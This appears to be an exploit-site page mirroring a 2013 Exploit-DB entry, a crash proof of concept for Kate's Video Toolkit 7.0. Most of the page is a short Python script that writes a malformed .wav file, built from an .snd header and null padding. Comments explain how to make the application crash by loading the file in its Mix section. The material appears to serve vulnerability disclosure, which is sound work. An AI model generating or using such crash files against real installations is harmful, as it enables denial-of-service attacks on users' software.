Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Kate's Video Toolkit Version 7.0 (.wav) - Crash POC - exploit.company
header-logo
Suggest Exploit
vendor:
Kate's Video Toolkit
by:
ariarat
N/A
CVSS
N/A
Crash
CWE
Product Name: Kate's Video Toolkit
Affected Version From: 7
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP sp3
2013

Kate’s Video Toolkit Version 7.0 (.wav) – Crash POC

This exploit crashes the Kate's Video Toolkit application when a specific .wav file is added to the Mix section of the application.

Mitigation:

Unknown
Source

Exploit-DB raw data:

# Exploit Title: Kate's Video Toolkit Version 7.0 (.wav) - Crash POC
# Date: 14-07-2013
# Exploit Author: ariarat
# Vendor Homepage: http://fakewebcam.com/Free-Video-Toolkit.asp
# Software Link: http://download.cnet.com/Kate-s-Video-Toolkit/3000-2139_4-10628194.html
# Version: 7.0 (maybe all versions!)
# Tested on: [ Windows XP sp3]
#============================================================================================
# In the Mix section of application : In the left frame add any video file and in right frame
# add kateVideoToolkit.wav file and click Mix then select your path and click OK!
# 
#
#============================================================================================
# Contact :
#------------------
# Web Page : http://ariarat.blogspot.com
# Email    : mehdi.esmaeelpour@gmail.com
#============================================================================================

#!/usr/bin/python

junk=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")


file = open("kateVideoToolkit.wav" , "w")
file.write(junk)
file.close()